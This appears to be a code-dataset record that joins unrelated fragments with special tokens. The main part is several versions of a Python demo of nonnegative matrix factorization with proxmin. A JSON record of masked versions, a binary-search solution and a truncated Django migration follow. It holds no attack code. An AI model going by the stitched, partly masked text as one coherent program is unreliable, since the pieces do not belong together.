ax = fig.add_subplot(311)
ax.set_title('True Components S')
ax.plot(trueS.T)
ax2 = fig.add_subplot(312)
ax2.set_title('Data Y')
ax2.plot(Y.T)
ax3 = fig.add_subplot(313)
ax3.set_title('Found Components S')
ax3.set_xlabel('Pixel')
ax3.plot(S.T)
fig.subplots_adjust(bottom=0.07, top=0.95, hspace=0.35)
fig.show()
convergences = []
As = tr['X', 0]
Ss = tr['X', 1]
for it in range(tr.it):
Y = np.dot(As[it], Ss[it])
convergences.append(((Y - trueY) ** 2).sum())
fig2 = plt.figure(figsize=(6, 4))
ax4 = fig2.add_subplot(111)
ax4.set_title('Convergence')
ax4.semilogy(convergences)
ax4.set_ylabel('$||Y-AS||^2$')
ax4.set_xlabel('Iterations')
fig2.show()
"""
# noise plot
#noises = np.linspace(0,0.05,21)
#repeat = 10
noises = [noise]
repeat = 1000
A_chi_squared = np.empty((len(noises), repeat))
S_chi_squared = np.empty((len(noises), repeat))
for i in range(len(noises)):
e = noises[i]
for r in range(repeat):
Y = add_noise(trueY, e)
A, S = nmf.nmf(Y, A0, S0, e_rel=1e-4, e_abs=1e-4, )
A, S = match(A, S, trueS)
A_chi_squared[i,r] = np.sum((A - trueA)**2)
S_chi_squared[i,r] = np.sum((S - trueS)**2)
fig3 = plt.figure(figsize=(6,4))
ax5 = fig3.add_subplot(111)
dof_A = A.shape[0]*A.shape[1]
dof_S = S.shape[0]*S.shape[1]
ax5.errorbar(noises, S_chi_squared.mean(axis=1)/dof_S, yerr=S_chi_squared.std(axis=1)/dof_S, label="$\\chi^2_S$ / DOF")
ax5.errorbar(noises, A_chi_squared.mean(axis=1)/dof_A, yerr=A_chi_squared.std(axis=1)/dof_A, label="$\\chi^2_A$ / DOF")
ax5.legend()
ax5.set_ylabel("Chi-squared")
ax5.set_xlabel("Standard deviation of noise")
fig3.show()
"""
<|reserved_special_token_1|>
from proxmin import nmf
from proxmin.utils import Traceback
from proxmin import operators as po
from scipy.optimize import linear_sum_assignment
import numpy as np
import matplotlib.pyplot as plt
import time
from functools import partial
import logging
logging.basicConfig()
logger = logging.getLogger('proxmin')
logger.setLevel(logging.INFO)
def generateComponent(m):
"""Creates oscillating components to be mixed"""
freq = 25 * np.random.random()
phase = 2 * np.pi * np.random.random()
x = np.arange(m)
return np.cos(x / freq - phase) ** 2
def generateAmplitudes(k):
"""Makes mixing coefficients"""
res = np.array([np.random.random() for i in range(k)])
return res / res.sum()
def add_noise(Y, sigma):
"""Adds noise to Y"""
return Y + np.random.normal(0, sigma, Y.shape)
def match(A, S, trueS):
"""Rearranges columns of S to best fit the components they likely represent (maximizes sum of correlations)"""
cov = np.cov(trueS, S)
k = S.shape[0]
corr = np.zeros([k, k])
for i in range(k):
for j in range(k):
corr[i][j] = cov[i + k][j] / np.sqrt(cov[i + k][i + k] * cov[j][j])
arrangement = linear_sum_assignment(-corr)
resS = np.zeros_like(S)
resAT = np.zeros_like(A.T)
for t in range(k):
resS[arrangement[1][t]] = S[arrangement[0][t]]
resAT[arrangement[1][t]] = A.T[arrangement[0][t]]
return resAT.T, resS
if __name__ == '__main__':
n = 50
k = 3
b = 100
noise = 0.02
np.random.seed(101)
trueA = np.array([generateAmplitudes(k) for i in range(b)])
trueS = np.array([generateComponent(n) for i in range(k)])
trueY = np.dot(trueA, trueS)
Y = add_noise(trueY, noise)
W = None
A = np.array([generateAmplitudes(k) for i in range(b)])
S = np.array([generateComponent(n) for i in range(k)])
p1 = partial(po.prox_unity_plus, axis=1)
proxs_g = [[p1], None]
tr = Traceback(2)
nmf(Y, A, S, W=W, prox_A=p1, e_rel=1e-06, e_abs=1e-06 / noise ** 2,
traceback=tr)
A, S = match(A, S, trueS)
fig = plt.figure(figsize=(6, 7))
ax = fig.add_subplot(311)
ax.set_title('True Components S')
ax.plot(trueS.T)
ax2 = fig.add_subplot(312)
ax2.set_title('Data Y')
ax2.plot(Y.T)
ax3 = fig.add_subplot(313)
ax3.set_title('Found Components S')
ax3.set_xlabel('Pixel')
ax3.plot(S.T)
fig.subplots_adjust(bottom=0.07, top=0.95, hspace=0.35)
fig.show()
convergences = []
As = tr['X', 0]
Ss = tr['X', 1]
for it in range(tr.it):
Y = np.dot(As[it], Ss[it])
convergences.append(((Y - trueY) ** 2).sum())
fig2 = plt.figure(figsize=(6, 4))
ax4 = fig2.add_subplot(111)
ax4.set_title('Convergence')
ax4.semilogy(convergences)
ax4.set_ylabel('$||Y-AS||^2$')
ax4.set_xlabel('Iterations')
fig2.show()
"""
# noise plot
#noises = np.linspace(0,0.05,21)
#repeat = 10
noises = [noise]
repeat = 1000
A_chi_squared = np.empty((len(noises), repeat))
S_chi_squared = np.empty((len(noises), repeat))
for i in range(len(noises)):
e = noises[i]
for r in range(repeat):
Y = add_noise(trueY, e)
A, S = nmf.nmf(Y, A0, S0, e_rel=1e-4, e_abs=1e-4, )
A, S = match(A, S, trueS)
A_chi_squared[i,r] = np.sum((A - trueA)**2)
S_chi_squared[i,r] = np.sum((S - trueS)**2)
fig3 = plt.figure(figsize=(6,4))
ax5 = fig3.add_subplot(111)
dof_A = A.shape[0]*A.shape[1]
dof_S = S.shape[0]*S.shape[1]
ax5.errorbar(noises, S_chi_squared.mean(axis=1)/dof_S, yerr=S_chi_squared.std(axis=1)/dof_S, label="$\\chi^2_S$ / DOF")
ax5.errorbar(noises, A_chi_squared.mean(axis=1)/dof_A, yerr=A_chi_squared.std(axis=1)/dof_A, label="$\\chi^2_A$ / DOF")
ax5.legend()
ax5.set_ylabel("Chi-squared")
ax5.set_xlabel("Standard deviation of noise")
fig3.show()
"""
<|reserved_special_token_1|>
from proxmin import nmf
from proxmin.utils import Traceback
from proxmin import operators as po
from scipy.optimize import linear_sum_assignment
import numpy as np
import matplotlib.pyplot as plt
import time
from functools import partial
# Configure logging so proxmin emits INFO-level progress messages while it runs.
import logging
logging.basicConfig()
logger = logging.getLogger('proxmin')
logger.setLevel(logging.INFO)
def generateComponent(m):
    """Return one synthetic component: a squared cosine curve of length *m*.

    A random frequency and phase are drawn from the global numpy RNG, so
    successive calls produce different oscillating curves with values in
    [0, 1].
    """
    frequency = 25 * np.random.random()
    shift = 2 * np.pi * np.random.random()
    samples = np.arange(m)
    return np.square(np.cos(samples / frequency - shift))
def generateAmplitudes(k):
    """Draw *k* random mixing coefficients normalized to sum to 1.

    Returns a length-k array on the probability simplex. The vectorized
    draw consumes the global numpy RNG stream exactly like k successive
    scalar ``np.random.random()`` calls, so seeded results are unchanged.
    """
    # Vectorized draw replaces the former Python-level list comprehension.
    res = np.random.random(k)
    return res / res.sum()
def add_noise(Y, sigma):
    """Return a copy of *Y* perturbed by i.i.d. Gaussian noise.

    The noise has zero mean and standard deviation *sigma*, with the same
    shape as *Y*; *Y* itself is not modified.
    """
    perturbation = np.random.normal(0, sigma, Y.shape)
    return Y + perturbation
def match(A, S, trueS):
    """Permute the rows of S (and the columns of A) to line up with trueS.

    Each recovered component S[i] is paired with the true component it
    correlates with best; the pairing maximizes the total Pearson
    correlation via the Hungarian algorithm (``linear_sum_assignment``).
    Returns the reordered (A, S) pair; A @ S is unchanged by the
    simultaneous permutation.
    """
    k = S.shape[0]
    # corr[i, j] = Pearson correlation between recovered S[i] and trueS[j];
    # np.corrcoef stacks trueS rows first, so the lower-left block is taken.
    corr = np.corrcoef(trueS, S)[k:, :k]
    src_idx, dst_idx = linear_sum_assignment(-corr)
    orderedS = np.zeros_like(S)
    orderedAT = np.zeros_like(A.T)
    for src, dst in zip(src_idx, dst_idx):
        orderedS[dst] = S[src]
        orderedAT[dst] = A.T[src]
    return orderedAT.T, orderedS
if __name__ == "__main__":
    # Demo: build a noisy mixture of known components, recover them with
    # NMF, then plot truth vs. data vs. recovered components.
    n = 50  # component resolution
    k = 3  # number of components
    b = 100  # number of observations
    noise = 0.02  # stdev of added noise
    # fixed seed so the demo is reproducible
    np.random.seed(101)
    # set up test data: trueA is (b, k) mixing weights, trueS is (k, n) components
    trueA = np.array([generateAmplitudes(k) for i in range(b)])
    trueS = np.array([generateComponent(n) for i in range(k)])
    trueY = np.dot(trueA,trueS)
    Y = add_noise(trueY, noise)
    # if noise is variable, specify variance matrix of the same shape as Y
    W = None
    # random starting guesses for the factorization
    A = np.array([generateAmplitudes(k) for i in range(b)])
    S = np.array([generateComponent(n) for i in range(k)])
    # proximal operator applied per row of A; presumably constrains rows to be
    # nonnegative and sum to one ("unity plus") -- confirm against proxmin docs
    p1 = partial(po.prox_unity_plus, axis=1)
    proxs_g=[[p1], None]
    # Traceback(2) records the iterate history of both variables (A and S)
    tr = Traceback(2)
    # nmf's return value is ignored; A and S are updated in place
    nmf(Y, A, S, W=W, prox_A=p1, e_rel=1e-6, e_abs=1e-6/noise**2, traceback=tr)
    # sort components to best match inputs
    A, S = match(A, S, trueS)
    # show data and model: truth (top), noisy data (middle), recovered (bottom)
    fig = plt.figure(figsize=(6,7))
    ax = fig.add_subplot(311)
    ax.set_title("True Components S")
    ax.plot(trueS.T)
    ax2 = fig.add_subplot(312)
    ax2.set_title("Data Y")
    ax2.plot(Y.T)
    ax3 = fig.add_subplot(313)
    ax3.set_title("Found Components S")
    ax3.set_xlabel("Pixel")
    ax3.plot(S.T)
    fig.subplots_adjust(bottom=0.07, top=0.95, hspace=0.35)
    fig.show()
    # convergence plot from traceback: squared error of the reconstructed
    # model against the noise-free truth at every recorded iteration
    convergences = []
    As = tr['X',0]  # per-iteration A estimates
    Ss = tr['X',1]  # per-iteration S estimates
    for it in range(tr.it):
        Y = np.dot(As[it], Ss[it])
        convergences.append(((Y - trueY)**2).sum())
    fig2 = plt.figure(figsize=(6,4))
    ax4 = fig2.add_subplot(111)
    ax4.set_title("Convergence")
    ax4.semilogy(convergences)
    ax4.set_ylabel("$||Y-AS||^2$")
    ax4.set_xlabel("Iterations")
    fig2.show()
    # NOTE(review): the block below is deliberately disabled (kept as a bare
    # string literal); it sweeps noise levels and plots chi-squared of the
    # recovered factors. It references undefined names (A0, S0, nmf.nmf) and
    # would need updating before being re-enabled.
    """
    # noise plot
    #noises = np.linspace(0,0.05,21)
    #repeat = 10
    noises = [noise]
    repeat = 1000
    A_chi_squared = np.empty((len(noises), repeat))
    S_chi_squared = np.empty((len(noises), repeat))
    for i in range(len(noises)):
        e = noises[i]
        for r in range(repeat):
            Y = add_noise(trueY, e)
            A, S = nmf.nmf(Y, A0, S0, e_rel=1e-4, e_abs=1e-4, )
            A, S = match(A, S, trueS)
            A_chi_squared[i,r] = np.sum((A - trueA)**2)
            S_chi_squared[i,r] = np.sum((S - trueS)**2)
    fig3 = plt.figure(figsize=(6,4))
    ax5 = fig3.add_subplot(111)
    dof_A = A.shape[0]*A.shape[1]
    dof_S = S.shape[0]*S.shape[1]
    ax5.errorbar(noises, S_chi_squared.mean(axis=1)/dof_S, yerr=S_chi_squared.std(axis=1)/dof_S, label="$\chi^2_S$ / DOF")
    ax5.errorbar(noises, A_chi_squared.mean(axis=1)/dof_A, yerr=A_chi_squared.std(axis=1)/dof_A, label="$\chi^2_A$ / DOF")
    ax5.legend()
    ax5.set_ylabel("Chi-squared")
    ax5.set_xlabel("Standard deviation of noise")
    fig3.show()
    """
|
flexible
|
{
"blob_id": "0edc0c2f86bda0122d4b231eed700d7a5b08ec1e",
"index": 8279,
"step-1": "<mask token>\n\n\ndef generateComponent(m):\n \"\"\"Creates oscillating components to be mixed\"\"\"\n freq = 25 * np.random.random()\n phase = 2 * np.pi * np.random.random()\n x = np.arange(m)\n return np.cos(x / freq - phase) ** 2\n\n\n<mask token>\n\n\ndef add_noise(Y, sigma):\n \"\"\"Adds noise to Y\"\"\"\n return Y + np.random.normal(0, sigma, Y.shape)\n\n\ndef match(A, S, trueS):\n \"\"\"Rearranges columns of S to best fit the components they likely represent (maximizes sum of correlations)\"\"\"\n cov = np.cov(trueS, S)\n k = S.shape[0]\n corr = np.zeros([k, k])\n for i in range(k):\n for j in range(k):\n corr[i][j] = cov[i + k][j] / np.sqrt(cov[i + k][i + k] * cov[j][j])\n arrangement = linear_sum_assignment(-corr)\n resS = np.zeros_like(S)\n resAT = np.zeros_like(A.T)\n for t in range(k):\n resS[arrangement[1][t]] = S[arrangement[0][t]]\n resAT[arrangement[1][t]] = A.T[arrangement[0][t]]\n return resAT.T, resS\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef generateComponent(m):\n \"\"\"Creates oscillating components to be mixed\"\"\"\n freq = 25 * np.random.random()\n phase = 2 * np.pi * np.random.random()\n x = np.arange(m)\n return np.cos(x / freq - phase) ** 2\n\n\ndef generateAmplitudes(k):\n \"\"\"Makes mixing coefficients\"\"\"\n res = np.array([np.random.random() for i in range(k)])\n return res / res.sum()\n\n\ndef add_noise(Y, sigma):\n \"\"\"Adds noise to Y\"\"\"\n return Y + np.random.normal(0, sigma, Y.shape)\n\n\ndef match(A, S, trueS):\n \"\"\"Rearranges columns of S to best fit the components they likely represent (maximizes sum of correlations)\"\"\"\n cov = np.cov(trueS, S)\n k = S.shape[0]\n corr = np.zeros([k, k])\n for i in range(k):\n for j in range(k):\n corr[i][j] = cov[i + k][j] / np.sqrt(cov[i + k][i + k] * cov[j][j])\n arrangement = linear_sum_assignment(-corr)\n resS = np.zeros_like(S)\n resAT = np.zeros_like(A.T)\n for t in range(k):\n resS[arrangement[1][t]] = S[arrangement[0][t]]\n resAT[arrangement[1][t]] = A.T[arrangement[0][t]]\n return resAT.T, resS\n\n\n<mask token>\n",
"step-3": "<mask token>\nlogging.basicConfig()\nlogger = logging.getLogger('proxmin')\nlogger.setLevel(logging.INFO)\n\n\ndef generateComponent(m):\n \"\"\"Creates oscillating components to be mixed\"\"\"\n freq = 25 * np.random.random()\n phase = 2 * np.pi * np.random.random()\n x = np.arange(m)\n return np.cos(x / freq - phase) ** 2\n\n\ndef generateAmplitudes(k):\n \"\"\"Makes mixing coefficients\"\"\"\n res = np.array([np.random.random() for i in range(k)])\n return res / res.sum()\n\n\ndef add_noise(Y, sigma):\n \"\"\"Adds noise to Y\"\"\"\n return Y + np.random.normal(0, sigma, Y.shape)\n\n\ndef match(A, S, trueS):\n \"\"\"Rearranges columns of S to best fit the components they likely represent (maximizes sum of correlations)\"\"\"\n cov = np.cov(trueS, S)\n k = S.shape[0]\n corr = np.zeros([k, k])\n for i in range(k):\n for j in range(k):\n corr[i][j] = cov[i + k][j] / np.sqrt(cov[i + k][i + k] * cov[j][j])\n arrangement = linear_sum_assignment(-corr)\n resS = np.zeros_like(S)\n resAT = np.zeros_like(A.T)\n for t in range(k):\n resS[arrangement[1][t]] = S[arrangement[0][t]]\n resAT[arrangement[1][t]] = A.T[arrangement[0][t]]\n return resAT.T, resS\n\n\nif __name__ == '__main__':\n n = 50\n k = 3\n b = 100\n noise = 0.02\n np.random.seed(101)\n trueA = np.array([generateAmplitudes(k) for i in range(b)])\n trueS = np.array([generateComponent(n) for i in range(k)])\n trueY = np.dot(trueA, trueS)\n Y = add_noise(trueY, noise)\n W = None\n A = np.array([generateAmplitudes(k) for i in range(b)])\n S = np.array([generateComponent(n) for i in range(k)])\n p1 = partial(po.prox_unity_plus, axis=1)\n proxs_g = [[p1], None]\n tr = Traceback(2)\n nmf(Y, A, S, W=W, prox_A=p1, e_rel=1e-06, e_abs=1e-06 / noise ** 2,\n traceback=tr)\n A, S = match(A, S, trueS)\n fig = plt.figure(figsize=(6, 7))\n ax = fig.add_subplot(311)\n ax.set_title('True Components S')\n ax.plot(trueS.T)\n ax2 = fig.add_subplot(312)\n ax2.set_title('Data Y')\n ax2.plot(Y.T)\n ax3 = 
fig.add_subplot(313)\n ax3.set_title('Found Components S')\n ax3.set_xlabel('Pixel')\n ax3.plot(S.T)\n fig.subplots_adjust(bottom=0.07, top=0.95, hspace=0.35)\n fig.show()\n convergences = []\n As = tr['X', 0]\n Ss = tr['X', 1]\n for it in range(tr.it):\n Y = np.dot(As[it], Ss[it])\n convergences.append(((Y - trueY) ** 2).sum())\n fig2 = plt.figure(figsize=(6, 4))\n ax4 = fig2.add_subplot(111)\n ax4.set_title('Convergence')\n ax4.semilogy(convergences)\n ax4.set_ylabel('$||Y-AS||^2$')\n ax4.set_xlabel('Iterations')\n fig2.show()\n \"\"\"\n # noise plot\n #noises = np.linspace(0,0.05,21)\n #repeat = 10\n noises = [noise]\n repeat = 1000\n A_chi_squared = np.empty((len(noises), repeat))\n S_chi_squared = np.empty((len(noises), repeat))\n for i in range(len(noises)):\n e = noises[i]\n for r in range(repeat):\n Y = add_noise(trueY, e)\n A, S = nmf.nmf(Y, A0, S0, e_rel=1e-4, e_abs=1e-4, )\n A, S = match(A, S, trueS)\n A_chi_squared[i,r] = np.sum((A - trueA)**2)\n S_chi_squared[i,r] = np.sum((S - trueS)**2)\n fig3 = plt.figure(figsize=(6,4))\n ax5 = fig3.add_subplot(111)\n dof_A = A.shape[0]*A.shape[1]\n dof_S = S.shape[0]*S.shape[1]\n ax5.errorbar(noises, S_chi_squared.mean(axis=1)/dof_S, yerr=S_chi_squared.std(axis=1)/dof_S, label=\"$\\\\chi^2_S$ / DOF\")\n ax5.errorbar(noises, A_chi_squared.mean(axis=1)/dof_A, yerr=A_chi_squared.std(axis=1)/dof_A, label=\"$\\\\chi^2_A$ / DOF\")\n ax5.legend()\n ax5.set_ylabel(\"Chi-squared\")\n ax5.set_xlabel(\"Standard deviation of noise\")\n fig3.show()\n \"\"\"\n",
"step-4": "from proxmin import nmf\nfrom proxmin.utils import Traceback\nfrom proxmin import operators as po\nfrom scipy.optimize import linear_sum_assignment\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nfrom functools import partial\nimport logging\nlogging.basicConfig()\nlogger = logging.getLogger('proxmin')\nlogger.setLevel(logging.INFO)\n\n\ndef generateComponent(m):\n \"\"\"Creates oscillating components to be mixed\"\"\"\n freq = 25 * np.random.random()\n phase = 2 * np.pi * np.random.random()\n x = np.arange(m)\n return np.cos(x / freq - phase) ** 2\n\n\ndef generateAmplitudes(k):\n \"\"\"Makes mixing coefficients\"\"\"\n res = np.array([np.random.random() for i in range(k)])\n return res / res.sum()\n\n\ndef add_noise(Y, sigma):\n \"\"\"Adds noise to Y\"\"\"\n return Y + np.random.normal(0, sigma, Y.shape)\n\n\ndef match(A, S, trueS):\n \"\"\"Rearranges columns of S to best fit the components they likely represent (maximizes sum of correlations)\"\"\"\n cov = np.cov(trueS, S)\n k = S.shape[0]\n corr = np.zeros([k, k])\n for i in range(k):\n for j in range(k):\n corr[i][j] = cov[i + k][j] / np.sqrt(cov[i + k][i + k] * cov[j][j])\n arrangement = linear_sum_assignment(-corr)\n resS = np.zeros_like(S)\n resAT = np.zeros_like(A.T)\n for t in range(k):\n resS[arrangement[1][t]] = S[arrangement[0][t]]\n resAT[arrangement[1][t]] = A.T[arrangement[0][t]]\n return resAT.T, resS\n\n\nif __name__ == '__main__':\n n = 50\n k = 3\n b = 100\n noise = 0.02\n np.random.seed(101)\n trueA = np.array([generateAmplitudes(k) for i in range(b)])\n trueS = np.array([generateComponent(n) for i in range(k)])\n trueY = np.dot(trueA, trueS)\n Y = add_noise(trueY, noise)\n W = None\n A = np.array([generateAmplitudes(k) for i in range(b)])\n S = np.array([generateComponent(n) for i in range(k)])\n p1 = partial(po.prox_unity_plus, axis=1)\n proxs_g = [[p1], None]\n tr = Traceback(2)\n nmf(Y, A, S, W=W, prox_A=p1, e_rel=1e-06, e_abs=1e-06 / noise ** 2,\n 
traceback=tr)\n A, S = match(A, S, trueS)\n fig = plt.figure(figsize=(6, 7))\n ax = fig.add_subplot(311)\n ax.set_title('True Components S')\n ax.plot(trueS.T)\n ax2 = fig.add_subplot(312)\n ax2.set_title('Data Y')\n ax2.plot(Y.T)\n ax3 = fig.add_subplot(313)\n ax3.set_title('Found Components S')\n ax3.set_xlabel('Pixel')\n ax3.plot(S.T)\n fig.subplots_adjust(bottom=0.07, top=0.95, hspace=0.35)\n fig.show()\n convergences = []\n As = tr['X', 0]\n Ss = tr['X', 1]\n for it in range(tr.it):\n Y = np.dot(As[it], Ss[it])\n convergences.append(((Y - trueY) ** 2).sum())\n fig2 = plt.figure(figsize=(6, 4))\n ax4 = fig2.add_subplot(111)\n ax4.set_title('Convergence')\n ax4.semilogy(convergences)\n ax4.set_ylabel('$||Y-AS||^2$')\n ax4.set_xlabel('Iterations')\n fig2.show()\n \"\"\"\n # noise plot\n #noises = np.linspace(0,0.05,21)\n #repeat = 10\n noises = [noise]\n repeat = 1000\n A_chi_squared = np.empty((len(noises), repeat))\n S_chi_squared = np.empty((len(noises), repeat))\n for i in range(len(noises)):\n e = noises[i]\n for r in range(repeat):\n Y = add_noise(trueY, e)\n A, S = nmf.nmf(Y, A0, S0, e_rel=1e-4, e_abs=1e-4, )\n A, S = match(A, S, trueS)\n A_chi_squared[i,r] = np.sum((A - trueA)**2)\n S_chi_squared[i,r] = np.sum((S - trueS)**2)\n fig3 = plt.figure(figsize=(6,4))\n ax5 = fig3.add_subplot(111)\n dof_A = A.shape[0]*A.shape[1]\n dof_S = S.shape[0]*S.shape[1]\n ax5.errorbar(noises, S_chi_squared.mean(axis=1)/dof_S, yerr=S_chi_squared.std(axis=1)/dof_S, label=\"$\\\\chi^2_S$ / DOF\")\n ax5.errorbar(noises, A_chi_squared.mean(axis=1)/dof_A, yerr=A_chi_squared.std(axis=1)/dof_A, label=\"$\\\\chi^2_A$ / DOF\")\n ax5.legend()\n ax5.set_ylabel(\"Chi-squared\")\n ax5.set_xlabel(\"Standard deviation of noise\")\n fig3.show()\n \"\"\"\n",
"step-5": "from proxmin import nmf\r\nfrom proxmin.utils import Traceback\r\nfrom proxmin import operators as po\r\nfrom scipy.optimize import linear_sum_assignment\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nfrom functools import partial\r\n\r\n# initialize and run NMF\r\nimport logging\r\nlogging.basicConfig()\r\nlogger = logging.getLogger('proxmin')\r\nlogger.setLevel(logging.INFO)\r\n\r\ndef generateComponent(m):\r\n \"\"\"Creates oscillating components to be mixed\"\"\"\r\n freq = 25*np.random.random()\r\n phase = 2*np.pi*np.random.random()\r\n x = np.arange(m)\r\n return np.cos(x/freq-phase)**2\r\n\r\ndef generateAmplitudes(k):\r\n \"\"\"Makes mixing coefficients\"\"\"\r\n res = np.array([np.random.random() for i in range(k)])\r\n return res/res.sum()\r\n\r\ndef add_noise(Y, sigma):\r\n \"\"\"Adds noise to Y\"\"\"\r\n return Y + np.random.normal(0, sigma, Y.shape)\r\n\r\ndef match(A, S, trueS):\r\n \"\"\"Rearranges columns of S to best fit the components they likely represent (maximizes sum of correlations)\"\"\"\r\n cov = np.cov(trueS, S)\r\n k = S.shape[0]\r\n corr = np.zeros([k,k])\r\n for i in range(k):\r\n for j in range(k):\r\n corr[i][j] = cov[i + k][j]/np.sqrt(cov[i + k][i + k]*cov[j][j])\r\n arrangement = linear_sum_assignment(-corr)\r\n resS = np.zeros_like(S)\r\n resAT = np.zeros_like(A.T)\r\n for t in range(k):\r\n resS[arrangement[1][t]] = S[arrangement[0][t]]\r\n resAT[arrangement[1][t]] = A.T[arrangement[0][t]]\r\n return resAT.T, resS\r\n\r\nif __name__ == \"__main__\":\r\n n = 50 \t\t\t# component resolution\r\n k = 3 \t\t\t# number of components\r\n b = 100\t\t\t# number of observations\r\n noise = 0.02 # stdev of added noise\r\n np.random.seed(101)\r\n\r\n # set up test data\r\n trueA = np.array([generateAmplitudes(k) for i in range(b)])\r\n trueS = np.array([generateComponent(n) for i in range(k)])\r\n trueY = np.dot(trueA,trueS)\r\n Y = add_noise(trueY, noise)\r\n # if noise is variable, specify variance 
matrix of the same shape as Y\r\n W = None\r\n\r\n A = np.array([generateAmplitudes(k) for i in range(b)])\r\n S = np.array([generateComponent(n) for i in range(k)])\r\n p1 = partial(po.prox_unity_plus, axis=1)\r\n proxs_g=[[p1], None]\r\n tr = Traceback(2)\r\n nmf(Y, A, S, W=W, prox_A=p1, e_rel=1e-6, e_abs=1e-6/noise**2, traceback=tr)\r\n # sort components to best match inputs\r\n A, S = match(A, S, trueS)\r\n\r\n # show data and model\r\n fig = plt.figure(figsize=(6,7))\r\n ax = fig.add_subplot(311)\r\n ax.set_title(\"True Components S\")\r\n ax.plot(trueS.T)\r\n ax2 = fig.add_subplot(312)\r\n ax2.set_title(\"Data Y\")\r\n ax2.plot(Y.T)\r\n ax3 = fig.add_subplot(313)\r\n ax3.set_title(\"Found Components S\")\r\n ax3.set_xlabel(\"Pixel\")\r\n ax3.plot(S.T)\r\n fig.subplots_adjust(bottom=0.07, top=0.95, hspace=0.35)\r\n fig.show()\r\n\r\n # convergence plot from traceback\r\n convergences = []\r\n As = tr['X',0]\r\n Ss = tr['X',1]\r\n for it in range(tr.it):\r\n Y = np.dot(As[it], Ss[it])\r\n convergences.append(((Y - trueY)**2).sum())\r\n fig2 = plt.figure(figsize=(6,4))\r\n ax4 = fig2.add_subplot(111)\r\n ax4.set_title(\"Convergence\")\r\n ax4.semilogy(convergences)\r\n ax4.set_ylabel(\"$||Y-AS||^2$\")\r\n ax4.set_xlabel(\"Iterations\")\r\n fig2.show()\r\n\r\n \"\"\"\r\n # noise plot\r\n #noises = np.linspace(0,0.05,21)\r\n #repeat = 10\r\n noises = [noise]\r\n repeat = 1000\r\n A_chi_squared = np.empty((len(noises), repeat))\r\n S_chi_squared = np.empty((len(noises), repeat))\r\n for i in range(len(noises)):\r\n e = noises[i]\r\n for r in range(repeat):\r\n Y = add_noise(trueY, e)\r\n A, S = nmf.nmf(Y, A0, S0, e_rel=1e-4, e_abs=1e-4, )\r\n A, S = match(A, S, trueS)\r\n A_chi_squared[i,r] = np.sum((A - trueA)**2)\r\n S_chi_squared[i,r] = np.sum((S - trueS)**2)\r\n fig3 = plt.figure(figsize=(6,4))\r\n ax5 = fig3.add_subplot(111)\r\n dof_A = A.shape[0]*A.shape[1]\r\n dof_S = S.shape[0]*S.shape[1]\r\n ax5.errorbar(noises, S_chi_squared.mean(axis=1)/dof_S, 
yerr=S_chi_squared.std(axis=1)/dof_S, label=\"$\\chi^2_S$ / DOF\")\r\n ax5.errorbar(noises, A_chi_squared.mean(axis=1)/dof_A, yerr=A_chi_squared.std(axis=1)/dof_A, label=\"$\\chi^2_A$ / DOF\")\r\n ax5.legend()\r\n ax5.set_ylabel(\"Chi-squared\")\r\n ax5.set_xlabel(\"Standard deviation of noise\")\r\n fig3.show()\r\n \"\"\"\r\n",
"step-ids": [
3,
4,
6,
7,
8
]
}
|
[
3,
4,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
"""
Package for django_static_template.
"""
|
flexible
|
{
"blob_id": "818623621b609d67f8f657be4ade6e3bb86a0bc5",
"index": 4226,
"step-1": "<mask token>\n",
"step-2": "\"\"\"\r\nPackage for django_static_template.\r\n\"\"\"\r\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution:
def searchRange(self, nums: List[int], target: int) ->List[int]:
res = [-1, -1]
def binary_serach(left, right, target, res):
if left >= right:
return
mid = (left + right) // 2
if nums[mid] == target:
if res[0] == -1:
res[0] = res[1] = mid
else:
res[0] = min(res[0], mid)
res[1] = max(res[1], mid)
if nums[mid] > target:
binary_serach(left, mid, target, res)
elif nums[mid] < target:
binary_serach(mid + 1, right, target, res)
else:
binary_serach(left, mid, target, res)
binary_serach(mid + 1, right, target, res)
if nums:
binary_serach(0, len(nums), target, res)
return res
|
flexible
|
{
"blob_id": "18b82f83d3bf729eadb2bd5a766f731a2c54a93b",
"index": 1607,
"step-1": "<mask token>\n",
"step-2": "class Solution:\n <mask token>\n",
"step-3": "class Solution:\n\n def searchRange(self, nums: List[int], target: int) ->List[int]:\n res = [-1, -1]\n\n def binary_serach(left, right, target, res):\n if left >= right:\n return\n mid = (left + right) // 2\n if nums[mid] == target:\n if res[0] == -1:\n res[0] = res[1] = mid\n else:\n res[0] = min(res[0], mid)\n res[1] = max(res[1], mid)\n if nums[mid] > target:\n binary_serach(left, mid, target, res)\n elif nums[mid] < target:\n binary_serach(mid + 1, right, target, res)\n else:\n binary_serach(left, mid, target, res)\n binary_serach(mid + 1, right, target, res)\n if nums:\n binary_serach(0, len(nums), target, res)\n return res\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('levantamiento', '0001_initial')]
operations = [migrations.CreateModel(name='FichaTecnica', fields=[('id',
models.AutoField(verbose_name='ID', serialize=False, auto_created=
True, primary_key=True)), ('numero', models.IntegerField(default=0)
), ('largo', models.FloatField(default=0)), ('ancho', models.
FloatField(default=0)), ('alto', models.FloatField(default=0)), (
'parcial', models.IntegerField(default=0)), ('unidad', models.
IntegerField(default=0)), ('punitario', models.IntegerField(default
=0)), ('form', models.ForeignKey(related_name='ficha_tecnica', to=
'levantamiento.Levantamiento'))], options={}, bases=(models.Model,)
), migrations.CreateModel(name='Metrado1', fields=[('id', models.
AutoField(verbose_name='ID', serialize=False, auto_created=True,
primary_key=True)), ('codigo', models.CharField(max_length=25)), (
'descripcion', models.TextField())], options={}, bases=(models.
Model,)), migrations.CreateModel(name='Metrado2', fields=[('id',
models.AutoField(verbose_name='ID', serialize=False, auto_created=
True, primary_key=True)), ('codigo', models.CharField(max_length=25
